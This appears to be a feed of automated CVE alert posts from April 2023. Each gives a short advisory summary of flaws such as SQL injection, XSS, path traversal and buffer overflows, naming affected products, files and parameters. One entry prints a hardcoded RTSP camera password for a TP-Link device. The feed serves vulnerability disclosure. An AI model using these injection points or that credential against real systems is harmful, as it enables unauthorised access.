🚨 CVE-2023-25010A malicious actor may convince a victim to open a malicious USD file that may trigger an uninitialized variable which may result in code execution.🎖@cveNotify |
|
| 2023-04-17 23:58:23 |
🚨 CVE-2023-27906A malicious actor may convince a victim to open a malicious USD file that may trigger an out-of-bounds read vulnerability which may result in code execution.🎖@cveNotify |
|
| 2023-04-17 23:58:20 |
🚨 CVE-2023-27907A malicious actor may convince a victim to open a malicious USD file that may trigger an out-of-bounds write vulnerability which may result in code execution.🎖@cveNotify |
|
| 2023-04-17 23:58:19 |
🚨 CVE-2023-27909An Out-Of-Bounds Write Vulnerability in Autodesk® FBX® SDK version 2020 or prior may lead to code execution through maliciously crafted FBX files or information disclosure.🎖@cveNotify |
|
| 2023-04-17 23:58:18 |
🚨 CVE-2023-27911A user may be tricked into opening a malicious FBX file that may exploit a heap buffer overflow vulnerability in Autodesk® FBX® SDK 2020 or prior which may lead to code execution.🎖@cveNotify |
|
| 2023-04-17 23:58:17 |
🚨 CVE-2023-30548gatsby-plugin-sharp is a plugin for the gatsby framework which exposes functions built on the Sharp image processing library. The gatsby-plugin-sharp plugin prior to versions 5.8.1 and 4.25.1 contains a path traversal vulnerability exposed when running the Gatsby develop server (`gatsby develop`). It should be noted that by default gatsby develop is only accessible via the localhost 127.0.0.1, and one would need to intentionally expose the server to other interfaces to exploit this vulnerability by using server options such as --host 0.0.0.0, -H 0.0.0.0, or the GATSBY_HOST=0.0.0.0 environment variable. Attackers exploiting this vulnerability will have read access to all files within the scope of the server process. A patch has been introduced in gatsby-plugin-sharp@5.8.1 and gatsby-plugin-sharp@4.25.1 which mitigates the issue by ensuring that included paths remain within the project directory. As stated above, by default gatsby develop is only exposed to the localhost 127.0.0.1. For those using the develop server in the default configuration no risk is posed. If other ranges are required, preventing the develop server from being exposed to untrusted interfaces or IP address ranges would mitigate the risk from this vulnerability. Users are non the less encouraged to upgrade to a safe version.🎖@cveNotify |
|
| 2023-04-17 23:58:14 |
🚨 CVE-2022-42946Parsing a maliciously crafted X_B and PRT file can force Autodesk Maya 2023 and 2022 to read beyond allocated buffer. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.🎖@cveNotify |
|
| 2023-04-17 23:58:13 |
🚨 CVE-2022-42947A maliciously crafted X_B file when parsed through Autodesk Maya 2023 and 2022 can be used to write beyond the allocated buffer. This vulnerability can lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-04-17 23:58:12 |
🚨 CVE-2023-2130A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-17 23:58:11 |
🚨 CVE-2023-30769Vulnerability discovered is related to the peer-to-peer (p2p) communications, attackers can craft consensus messages, send it to individual nodes and take them offline. An attacker can crawl the network peers using getaddr message and attack the unpatched nodes.🎖@cveNotify |
|
| 2023-04-17 20:58:29 |
🚨 CVE-2015-10103A vulnerability, which was classified as problematic, was found in InternalError503 Forget It up to 1.3. This affects an unknown part of the file js/settings.js. The manipulation of the argument setForgetTime with the input 0 leads to infinite loop. It is possible to launch the attack on the local host. Upgrading to version 1.4 is able to address this issue. The name of the patch is adf0c7fd59b9c935b4fd675c556265620124999c. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-226119.🎖@cveNotify |
|
| 2023-04-17 20:58:28 |
🚨 CVE-2023-29004hap-wi/roxy-wi is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. A Path Traversal vulnerability was found in the current version of Roxy-WI (6.3.9.0 at the moment of writing this report). The vulnerability can be exploited via an HTTP request to /app/options.py and the config_file_name parameter. Successful exploitation of this vulnerability could allow an attacker with user level privileges to obtain the content of arbitrary files on the file server within the scope of what the server process has access to. The root-cause of the vulnerability lies in the get_config function of the /app/modules/config/config.py file, which only checks for relative path traversal, but still allows to read files from absolute locations passed via the config_file_name parameter.🎖@cveNotify |
|
| 2023-04-17 20:58:24 |
🚨 CVE-2022-41098Windows GDI+ Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-04-17 20:58:23 |
🚨 CVE-2023-21715Microsoft Publisher Security Features Bypass Vulnerability🎖@cveNotify |
|
| 2023-04-17 20:58:22 |
🚨 CVE-2023-23382Azure Machine Learning Compute Instance Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-04-17 20:58:21 |
🚨 CVE-2023-21739Windows Bluetooth Driver Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2023-04-17 20:58:20 |
🚨 CVE-2022-24480Outlook for Android Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2023-04-17 20:58:16 |
🚨 CVE-2022-23292Microsoft Power BI Spoofing Vulnerability.🎖@cveNotify |
|
| 2023-04-17 20:58:15 |
🚨 CVE-2022-24512.NET and Visual Studio Remote Code Execution Vulnerability.🎖@cveNotify |
|
| 2023-04-17 20:58:14 |
🚨 CVE-2023-21778Microsoft Dynamics Unified Service Desk Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-04-17 20:58:13 |
🚨 CVE-2023-21807Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability🎖@cveNotify |
|
| 2023-04-17 20:58:12 |
🚨 CVE-2015-10102A vulnerability, which was classified as critical, has been found in Freshdesk Plugin 1.7 on WordPress. Affected by this issue is some unknown functionality. The manipulation leads to open redirect. The attack may be launched remotely. Upgrading to version 1.8 is able to address this issue. The name of the patch is 2aaecd4e0c7c6c1dc4e6a593163d5f7aa0fa5d5b. It is recommended to upgrade the affected component. VDB-226118 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-17 18:58:15 |
🚨 CVE-2023-29665D-Link DIR823G_V1.0.2B05 was discovered to contain a stack overflow via the NewPassword parameters in SetPasswdSettings.🎖@cveNotify |
|
| 2023-04-17 18:58:14 |
🚨 CVE-2023-27525An authenticated user with Gamma role authorization could have access to metadata information using non trivial methods in Apache Superset up to and including 2.0.1🎖@cveNotify |
|
| 2023-04-17 16:58:34 |
🚨 CVE-2023-1950A vulnerability has been found in PHPGurukul BP Monitoring Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file password-recovery.php of the component Password Recovery. The manipulation of the argument emailid/contactno leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-225337 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-17 16:58:33 |
🚨 CVE-2023-0277The WC Fields Factory WordPress plugin through 4.1.5 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin🎖@cveNotify |
|
| 2023-04-17 16:58:32 |
🚨 CVE-2023-0367The Pricing Tables For WPBakery Page Builder (formerly Visual Composer) WordPress plugin before 3.0 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-04-17 16:58:28 |
🚨 CVE-2023-0764The Gallery by BestWebSoft WordPress plugin before 4.7.0 does not perform proper sanitization of gallery information, leading to a Stored Cross-Site Scription vulnerability. The attacker must have at least the privileges of the Author role.🎖@cveNotify |
|
| 2023-04-17 16:58:27 |
🚨 CVE-2023-1274The Pricing Tables For WPBakery Page Builder (formerly Visual Composer) WordPress plugin before 3.0 does not validate some shortcode attributes before using them to generate paths passed to include function/s, allowing any authenticated users such as subscriber to perform LFI attacks🎖@cveNotify |
|
| 2023-04-17 16:58:22 |
🚨 CVE-2023-1325The Easy Forms for Mailchimp WordPress plugin before 6.8.7 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-04-17 16:58:21 |
🚨 CVE-2023-1371The W4 Post List WordPress plugin before 2.4.6 does not ensure that password protected posts can be accessed before displaying their content, which could allow any authenticated users to access them🎖@cveNotify |
|
| 2023-04-17 16:58:20 |
🚨 CVE-2023-1373The W4 Post List WordPress plugin before 2.4.6 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting🎖@cveNotify |
|
| 2023-04-17 16:58:16 |
🚨 CVE-2023-1413The WP VR WordPress plugin before 8.2.9 does not sanitise and escape some parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-04-17 16:58:15 |
🚨 CVE-2023-1427- The Photo Gallery by 10Web WordPress plugin before 1.8.15 did not ensure that uploaded files are kept inside its uploads folder, allowing high privilege users to put images anywhere in the filesystem via a path traversal vector.🎖@cveNotify |
|
| 2023-04-17 16:58:14 |
🚨 CVE-2023-27733DedeCMS v5.7.106 was discovered to contain a SQL injection vulnerability via the component /dede/sys_sql_query.php.🎖@cveNotify |
|
| 2023-04-17 16:58:13 |
🚨 CVE-2023-27844SQL injection vulnerability found in PrestaShopleurlrewrite v.1.0 and before allow a remote attacker to gain privileges via the Dispatcher::getController component.🎖@cveNotify |
|
| 2023-04-17 14:58:39 |
🚨 CVE-2023-25542Dell Trusted Device Agent, versions prior to 5.3.0, contain(s) an improper installation permissions vulnerability. An unauthenticated local attacker could potentially exploit this vulnerability, leading to escalated privileges.🎖@cveNotify |
|
| 2023-04-17 14:58:38 |
🚨 CVE-2022-44726The TouchDown Timesheet tracking component 4.1.4 for Jira allows XSS in the calendar view.🎖@cveNotify |
|
| 2023-04-17 14:58:37 |
🚨 CVE-2023-0277The WC Fields Factory WordPress plugin through 4.1.5 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin🎖@cveNotify |
|
| 2023-04-17 14:58:36 |
🚨 CVE-2023-0367The Pricing Tables For WPBakery Page Builder (formerly Visual Composer) WordPress plugin before 3.0 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-04-17 14:58:34 |
🚨 CVE-2023-0374The W4 Post List WordPress plugin before 2.4.6 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-04-17 14:58:33 |
🚨 CVE-2023-0764The Gallery by BestWebSoft WordPress plugin before 4.7.0 does not perform proper sanitization of gallery information, leading to a Stored Cross-Site Scription vulnerability. The attacker must have at least the privileges of the Author role.🎖@cveNotify |
|
| 2023-04-17 14:58:32 |
🚨 CVE-2023-0765The Gallery by BestWebSoft WordPress plugin before 4.7.0 does not properly escape values used in SQL queries, leading to an Blind SQL Injection vulnerability. The attacker must have at least the privileges of an Author, and the vendor's Slider plugin (https://wordpress.org/plugins/slider-bws/) must also be installed for this vulnerability to be exploitable.🎖@cveNotify |
|
| 2023-04-17 14:58:31 |
🚨 CVE-2023-0889Themeflection Numbers WordPress plugin before 2.0.1 does not have authorisation and CSRF check in an AJAX action, and does not ensure that the options to be updated belong to the plugin. As a result, it could allow any authenticated users, such as subscriber, to update arbitrary blog options, such as enabling registration and set the default role to administrator🎖@cveNotify |
|
| 2023-04-17 14:58:30 |
🚨 CVE-2023-1274The Pricing Tables For WPBakery Page Builder (formerly Visual Composer) WordPress plugin before 3.0 does not validate some shortcode attributes before using them to generate paths passed to include function/s, allowing any authenticated users such as subscriber to perform LFI attacks🎖@cveNotify |
|
| 2023-04-17 14:58:29 |
🚨 CVE-2023-1282The Drag and Drop Multiple File Upload PRO - Contact Form 7 Standard WordPress plugin before 2.11.1 and Drag and Drop Multiple File Upload PRO - Contact Form 7 with Remote Storage Integrations WordPress plugin before 5.0.6.4 do not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high-privilege users such as admins.🎖@cveNotify |
|
| 2023-04-17 14:58:28 |
🚨 CVE-2023-1325The Easy Forms for Mailchimp WordPress plugin before 6.8.7 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-04-17 14:58:27 |
🚨 CVE-2023-1331The Redirection WordPress plugin before 1.1.5 does not have CSRF checks in the uninstall action, which could allow attackers to make logged in admins delete all the redirections through a CSRF attack.🎖@cveNotify |
|
| 2023-04-17 14:58:26 |
🚨 CVE-2023-1371The W4 Post List WordPress plugin before 2.4.6 does not ensure that password protected posts can be accessed before displaying their content, which could allow any authenticated users to access them🎖@cveNotify |
|
| 2023-04-17 14:58:25 |
🚨 CVE-2023-1373The W4 Post List WordPress plugin before 2.4.6 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting🎖@cveNotify |
|
| 2023-04-17 14:58:24 |
🚨 CVE-2023-1413The WP VR WordPress plugin before 8.2.9 does not sanitise and escape some parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-04-17 14:58:19 |
🚨 CVE-2023-1427- The Photo Gallery by 10Web WordPress plugin before 1.8.15 did not ensure that uploaded files are kept inside its uploads folder, allowing high privilege users to put images anywhere in the filesystem via a path traversal vector.🎖@cveNotify |
|
| 2023-04-17 14:58:18 |
🚨 CVE-2023-27733DedeCMS v5.7.106 was discovered to contain a SQL injection vulnerability via the component /dede/sys_sql_query.php.🎖@cveNotify |
|
| 2023-04-17 14:58:17 |
🚨 CVE-2023-27844SQL injection vulnerability found in PrestaShopleurlrewrite v.1.0 and before allow a remote attacker to gain privileges via the Dispatcher::getController component.🎖@cveNotify |
|
| 2023-04-17 14:58:16 |
🚨 CVE-2023-1723Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Veragroup Mobile Assistant allows SQL Injection.This issue affects Mobile Assistant: before 21.S.2343.🎖@cveNotify |
|
| 2023-04-17 11:58:23 |
🚨 CVE-2023-1109In Phoenix Contacts ENERGY AXC PU Web service an authenticated restricted user of the web frontend can access, read, write and create files throughout the file system using specially crafted URLs via the upload and download functionality of the web service. This may lead to full control of the service.🎖@cveNotify |
|
| 2023-04-17 11:58:22 |
🚨 CVE-2023-22946In Apache Spark versions prior to 3.4.0, applications using spark-submit can specify a 'proxy-user' to run as, limiting privileges. The application can execute code with the privileges of the submitting user, however, by providing malicious configuration-related classes on the classpath. This affects architectures relying on proxy-user, for example those using Apache Livy to manage submitted applications.Update to Apache Spark 3.4.0 or later, and ensure that spark.submit.proxyUser.allowCustomClasspathInClusterMode is set to its default of "false", and is not overridden by submitted applications.🎖@cveNotify |
|
| 2023-04-17 11:58:21 |
🚨 CVE-2023-30771Incorrect Authorization vulnerability in Apache Software Foundation Apache IoTDB.This issue affects the iotdb-web-workbench component on 0.13.3. iotdb-web-workbench is an optional component of IoTDB, providing a web console of the database.This problem is fixed from version 0.13.4 of iotdb-web-workbench onwards.🎖@cveNotify |
|
| 2023-04-17 11:58:20 |
🚨 CVE-2023-1728Unrestricted Upload of File with Dangerous Type vulnerability in Fernus Informatics LMS allows OS Command Injection, Server Side Include (SSI) Injection.This issue affects LMS: before 23.04.03.🎖@cveNotify |
|
| 2023-04-17 11:58:18 |
🚨 CVE-2022-4554B2B Customer Ordering System developed by ID Software Project and Consultancy Services before version 1.0.0.347 has an authenticated Reflected XSS vulnerability. This has been fixed in the version 1.0.0.347.🎖@cveNotify |
|
| 2023-04-17 11:58:17 |
🚨 CVE-2022-2808Authorization Bypass Through User-Controlled Key vulnerability in Algan Software Prens Student Information System allows Object Relational Mapping Injection.This issue affects Prens Student Information System: before 2.1.11.🎖@cveNotify |
|
| 2023-04-17 11:58:16 |
🚨 CVE-2023-24831Improper Authentication vulnerability in Apache Software Foundation Apache IoTDB.This issue affects Apache IoTDB Grafana Connector: from 0.13.0 through 0.13.3.Attackers could login without authorization. This is fixed in 0.13.4.🎖@cveNotify |
|
| 2023-04-17 11:58:15 |
🚨 CVE-2023-30770A stack-based buffer overflow vulnerability was found in the ASUSTOR Data Master (ADM) due to the lack of data size validation. An attacker can exploit this vulnerability to execute arbitrary code. Affected ADM versions include: 4.0.6.REG2, 4.1.0 and below as well as 4.2.0.RE71 and below.🎖@cveNotify |
|
| 2023-04-17 11:58:14 |
🚨 CVE-2023-2033Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-17 05:58:15 |
🚨 CVE-2023-28450An issue was discovered in Dnsmasq before 2.90. The default maximum EDNS.0 UDP packet size was set to 4096 but should be 1232 because of DNS Flag Day 2020.🎖@cveNotify |
|
| 2023-04-17 05:58:14 |
🚨 CVE-2023-2109Cross-site Scripting (XSS) - DOM in GitHub repository chatwoot/chatwoot prior to 2.14.0.🎖@cveNotify |
|
| 2023-04-16 16:58:13 |
🚨 CVE-2014-0181The Netlink implementation in the Linux kernel through 3.14.1 does not provide a mechanism for authorizing socket operations based on the opener of a socket, which allows local users to bypass intended access restrictions and modify network configurations by using a Netlink socket for the (1) stdout or (2) stderr of a setuid program.🎖@cveNotify |
|
| 2023-04-16 12:58:15 |
🚨 CVE-2022-24037Karmasis Informatics Infraskope SIEM+ has an unauthenticated access vulnerability which could allow an unauthenticated attacker to obtain critical information.🎖@cveNotify |
|
| 2023-04-16 12:58:14 |
🚨 CVE-2022-24036Karmasis Informatics Infraskope SIEM+ has an unauthenticated access vulnerability which could allow an unauthenticated attacker to modificate logs.🎖@cveNotify |
|
| 2023-04-16 12:58:13 |
🚨 CVE-2022-2807SQL Injection vulnerability in Algan Software Prens Student Information System allows SQL Injection.This issue affects Prens Student Information System: before 2.1.11.🎖@cveNotify |
|
| 2023-04-16 12:58:12 |
🚨 CVE-2022-2808Authorization Bypass Through User-Controlled Key vulnerability in Algan Software Prens Student Information System allows Object Relational Mapping Injection.This issue affects Prens Student Information System: before 2.1.11.🎖@cveNotify |
|
| 2023-04-16 10:58:19 |
🚨 CVE-2023-30542OpenZeppelin Contracts is a library for secure smart contract development. The proposal creation entrypoint (`propose`) in `GovernorCompatibilityBravo` allows the creation of proposals with a `signatures` array shorter than the `calldatas` array. This causes the additional elements of the latter to be ignored, and if the proposal succeeds the corresponding actions would eventually execute without any calldata. The `ProposalCreated` event correctly represents what will eventually execute, but the proposal parameters as queried through `getActions` appear to respect the original intended calldata. This issue has been patched in 4.8.3. As a workaround, ensure that all proposals that pass through governance have equal length `signatures` and `calldatas` parameters.🎖@cveNotify |
|
| 2023-04-16 10:58:18 |
🚨 CVE-2022-48312The HwPCAssistant module has the out-of-bounds read/write vulnerability. Successful exploitation of this vulnerability may affect confidentiality and integrity.🎖@cveNotify |
|
| 2023-04-16 10:58:14 |
🚨 CVE-2023-29211XWiki Commons are technical libraries common to several other top level XWiki projects. Any user with view rights `WikiManager.DeleteWiki` can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping of the `wikiId` url parameter. The problem has been patched on XWiki 13.10.11, 14.4.7, and 14.10.🎖@cveNotify |
|
| 2023-04-16 10:58:13 |
🚨 CVE-2023-29506XWiki Commons are technical libraries common to several other top level XWiki projects. It was possible to inject some code using the URL of authenticated endpoints. This problem has been patched on XWiki 13.10.11, 14.4.7 and 14.10.🎖@cveNotify |
|
| 2023-04-16 10:58:12 |
🚨 CVE-2023-29507XWiki Commons are technical libraries common to several other top level XWiki projects. The Document script API returns directly a DocumentAuthors allowing to set any authors to the document, which in consequence can allow subsequent executions of scripts since this author is used for checking rights. The problem has been patched in XWiki 14.10 and 14.4.7 by returning a safe script API.🎖@cveNotify |
|
| 2023-04-16 05:58:37 |
🚨 CVE-2022-34127The Managentities plugin before 4.0.2 for GLPI allows reading local files via directory traversal in the inc/cri.class.php file parameter.🎖@cveNotify |
|
| 2023-04-16 05:58:36 |
🚨 CVE-2022-34128The Cartography (aka positions) plugin before 6.0.1 for GLPI allows remote code execution via PHP code in the POST data to front/upload.php.🎖@cveNotify |
|
| 2023-04-16 05:58:35 |
🚨 CVE-2022-34125front/icon.send.php in the CMDB plugin before 3.0.3 for GLPI allows attackers to gain read access to sensitive information via a _log/ pathname in the file parameter.🎖@cveNotify |
|
| 2023-04-16 05:58:34 |
🚨 CVE-2022-37186In LemonLDAP::NG before 2.0.15. some sessions are not deleted when they are supposed to be deleted according to the timeoutActivity setting. This can occur when there are at least two servers, and a session is manually removed before the time at which it would have been removed automatically.🎖@cveNotify |
|
| 2023-04-16 05:58:30 |
🚨 CVE-2022-37255TP-Link Tapo C310 1.3.0 devices allow access to the RTSP video feed via credentials of User --- and Password TPL075526460603.🎖@cveNotify |
|
| 2023-04-16 05:58:29 |
🚨 CVE-2022-37306OX App Suite before 7.10.6-rev30 allows XSS via an upsell trigger.🎖@cveNotify |
|
| 2023-04-16 05:58:28 |
🚨 CVE-2022-38840cgi-bin/xmlstatus.cgi in Güralp MAN-EAM-0003 3.2.4 is vulnerable to an XML External Entity (XXE) issue via XML file upload, which leads to local file disclosure.🎖@cveNotify |
|
| 2023-04-16 05:58:27 |
🚨 CVE-2022-38841Linksys AX3200 1.1.00 is vulnerable to OS command injection by authenticated users via shell metacharacters to the diagnostics traceroute page.🎖@cveNotify |
|
| 2023-04-16 05:58:26 |
🚨 CVE-2022-40946On D-Link DIR-819 Firmware Version 1.06 Hardware Version A1 devices, it is possible to trigger a Denial of Service via the sys_token parameter in a cgi-bin/webproc?getpage=html/index.html request.🎖@cveNotify |
|
| 2023-04-16 05:58:23 |
🚨 CVE-2022-43128Dreamer CMS 4.0.1 allows SQL injection via ArchivesMapper.xml.🎖@cveNotify |
|
| 2023-04-16 05:58:22 |
🚨 CVE-2022-37704Amanda 3.5.1 allows privilege escalation from the regular user backup to root. The SUID binary located at /lib/amanda/rundump will execute /usr/sbin/dump as root with controlled arguments from the attacker which may lead to escalation of privileges, denial of service, and information disclosure.🎖@cveNotify |
|
| 2023-04-16 05:58:21 |
🚨 CVE-2022-37705A privilege escalation flaw was found in Amanda 3.5.1 in which the backup user can acquire root privileges. The vulnerable component is the runtar SUID program, which is a wrapper to run /usr/bin/tar with specific arguments that are controllable by the attacker. This program mishandles the arguments passed to tar binary (it expects that the argument name and value are separated with a space; however, separating them with an equals sign is also supported),🎖@cveNotify |
|
| 2023-04-16 05:58:20 |
🚨 CVE-2018-17537An issue was discovered in GitLab Community and Enterprise Edition before 11.1.7, 11.2.x before 11.2.4, and 11.3.x before 11.3.1. blog-viewer has stored XSS during repository browsing, if package.json exists. .🎖@cveNotify |
|
| 2023-04-16 05:58:16 |
🚨 CVE-2018-17883An issue was discovered in Open Ticket Request System (OTRS) 6.0.x before 6.0.12. An attacker could send an e-mail message with a malicious link to an OTRS system or an agent. If a logged-in agent opens this link, it could cause the execution of JavaScript in the context of OTRS.🎖@cveNotify |
|
| 2023-04-16 05:58:15 |
🚨 CVE-2019-14944An issue was discovered in GitLab Community and Enterprise Edition before 11.11.8, 12 before 12.0.6, and 12.1 before 12.1.6. Gitaly allows injection of command-line flags. This sometimes leads to privilege escalation or remote code execution.🎖@cveNotify |
|
| 2023-04-16 05:58:14 |
🚨 CVE-2019-14942An issue was discovered in GitLab Community and Enterprise Edition before 11.11.8, 12 before 12.0.6, and 12.1 before 12.1.6. Cookies for GitLab Pages (which have access control) could be sent over cleartext HTTP.🎖@cveNotify |
|
| 2023-04-16 05:58:13 |
🚨 CVE-2020-28163libdwarf before 20201201 allows a dwarf_print_lines.c NULL pointer dereference and application crash via a DWARF5 line-table header that has an invalid FORM for a pathname.🎖@cveNotify |
|
| 2023-04-16 00:58:19 |
🚨 CVE-2018-17455An issue was discovered in GitLab Enterprise Edition before 11.1.7, 11.2.x before 11.2.4, and 11.3.x before 11.3.1. Attackers could obtain sensitive information about group names, avatars, LDAP settings, and descriptions via an insecure direct object reference to the "merge request approvals" feature.🎖@cveNotify |
|
| 2023-04-16 00:58:13 |
🚨 CVE-2018-17536An issue was discovered in GitLab Community and Enterprise Edition before 11.1.7, 11.2.x before 11.2.4, and 11.3.x before 11.3.1. There is stored XSS on the merge request page via project import.🎖@cveNotify |
|
| 2023-04-16 00:58:12 |
🚨 CVE-2020-29007The Score extension through 0.3.0 for MediaWiki has a remote code execution vulnerability due to improper sandboxing of the GNU LilyPond executable. This allows any user with an ability to edit articles (potentially including unauthenticated anonymous users) to execute arbitrary Scheme or shell code by using crafted {{Image data to generate musical scores containing malicious code.🎖@cveNotify |
|
| 2023-04-16 00:58:11 |
🚨 CVE-2021-43612In lldpd before 1.0.13, when decoding SONMP packets in the sonmp_decode function, it's possible to trigger an out-of-bounds heap read via short SONMP packets.🎖@cveNotify |
|
| 2023-04-15 22:58:15 |
🚨 CVE-2015-10101A vulnerability classified as problematic was found in Google Analytics Top Content Widget Plugin up to 1.5.6 on WordPress. Affected by this vulnerability is an unknown functionality of the file class-tgm-plugin-activation.php. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 1.5.7 is able to address this issue. The name of the patch is 25bb1dea113716200a6f0f3135801d84a7a65540. It is recommended to upgrade the affected component. The identifier VDB-226117 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-15 22:58:14 |
🚨 CVE-2021-30153An issue was discovered in the VisualEditor extension in MediaWiki before 1.31.13, and 1.32.x through 1.35.x before 1.35.2. . When using VisualEditor to edit a MediaWiki user page belonging to an existing, but hidden, user, VisualEditor will disclose that the user exists. (It shouldn't because they are hidden.) This is related to ApiVisualEditor.🎖@cveNotify |
|
| 2023-04-15 22:58:13 |
🚨 CVE-2021-34337An issue was discovered in Mailman Core before 3.3.5. An attacker with access to the REST API could use timing attacks to determine the value of the configured REST API password and then make arbitrary REST API calls. The REST API is bound to localhost by default, limiting the ability for attackers to exploit this, but can optionally be made to listen on other interfaces.🎖@cveNotify |
|
| 2023-04-15 22:58:12 |
🚨 CVE-2021-39295In OpenBMC 2.9, crafted IPMI messages allow an attacker to cause a denial of service to the BMC via the netipmid (IPMI lan+) interface.🎖@cveNotify |
|
| 2023-04-15 18:58:12 |
🚨 CVE-2023-29208XWiki Commons are technical libraries common to several other top level XWiki projects. Rights added to a document are not taken into account for viewing it once it's deleted. Note that this vulnerability only impact deleted documents that where containing view rights: the view rights provided on a space of a deleted document are properly checked. The problem has been patched in XWiki 14.10 by checking the rights of current user: only admin and deleter of the document are allowed to view it.🎖@cveNotify |
|
| 2023-04-15 17:58:18 |
🚨 CVE-2023-29202XWiki Commons are technical libraries common to several other top level XWiki projects. The RSS macro that is bundled in XWiki included the content of the feed items without any cleaning in the HTML output when the parameter `content` was set to `true`. This allowed arbitrary HTML and in particular also JavaScript injection and thus cross-site scripting (XSS) by specifying an RSS feed with malicious content. With the interaction of a user with programming rights, this could be used to execute arbitrary actions in the wiki, including privilege escalation, remote code execution, information disclosure, modifying or deleting content and sabotaging the wiki. The issue has been patched in XWiki 14.6 RC1, the content of the feed is now properly cleaned before being displayed. As a workaround, if the RSS macro isn't used in the wiki, the macro can be uninstalled by deleting `WEB-INF/lib/xwiki-platform-rendering-macro-rss-XX.jar`, where `XX` is XWiki's version, in the web application's directory.🎖@cveNotify |
|
| 2023-04-15 17:58:14 |
🚨 CVE-2023-2103Cross-site Scripting (XSS) - Stored in GitHub repository alextselegidis/easyappointments prior to 1.5.0.🎖@cveNotify |
|
| 2023-04-15 17:58:13 |
🚨 CVE-2023-2105Session Fixation in GitHub repository alextselegidis/easyappointments prior to 1.5.0.🎖@cveNotify |
|
| 2023-04-15 17:58:12 |
🚨 CVE-2023-2107A vulnerability, which was classified as critical, was found in IBOS 4.5.5. Affected is an unknown function of the file file/personal/del&op=recycle. The manipulation of the argument fids leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226110 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-15 15:58:21 |
🚨 CVE-2022-2525Improper Restriction of Excessive Authentication Attempts in GitHub repository janeczku/calibre-web prior to 0.6.20.🎖@cveNotify |
|
| 2023-04-15 15:58:19 |
🚨 CVE-2023-2100A vulnerability classified as problematic was found in SourceCodester Vehicle Service Management System 1.0. This vulnerability affects unknown code of the file /admin/report/index.php. The manipulation of the argument date_end leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-226108.🎖@cveNotify |
|
| 2023-04-15 15:58:18 |
🚨 CVE-2023-2101A vulnerability, which was classified as problematic, has been found in moxi624 Mogu Blog v2 up to 5.2. This issue affects the function uploadPictureByUrl of the file /mogu-picture/file/uploadPicsByUrl. The manipulation of the argument urlList leads to absolute path traversal. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-226109 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-15 15:58:17 |
🚨 CVE-2023-2102Cross-site Scripting (XSS) - Stored in GitHub repository alextselegidis/easyappointments prior to 1.5.0.🎖@cveNotify |
|
| 2023-04-15 15:58:16 |
🚨 CVE-2023-2097A vulnerability was found in SourceCodester Vehicle Service Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /classes/Master.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-226105 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-15 15:58:15 |
🚨 CVE-2023-2098A vulnerability was found in SourceCodester Vehicle Service Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /inc/topBarNav.php. The manipulation of the argument search leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-226106 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
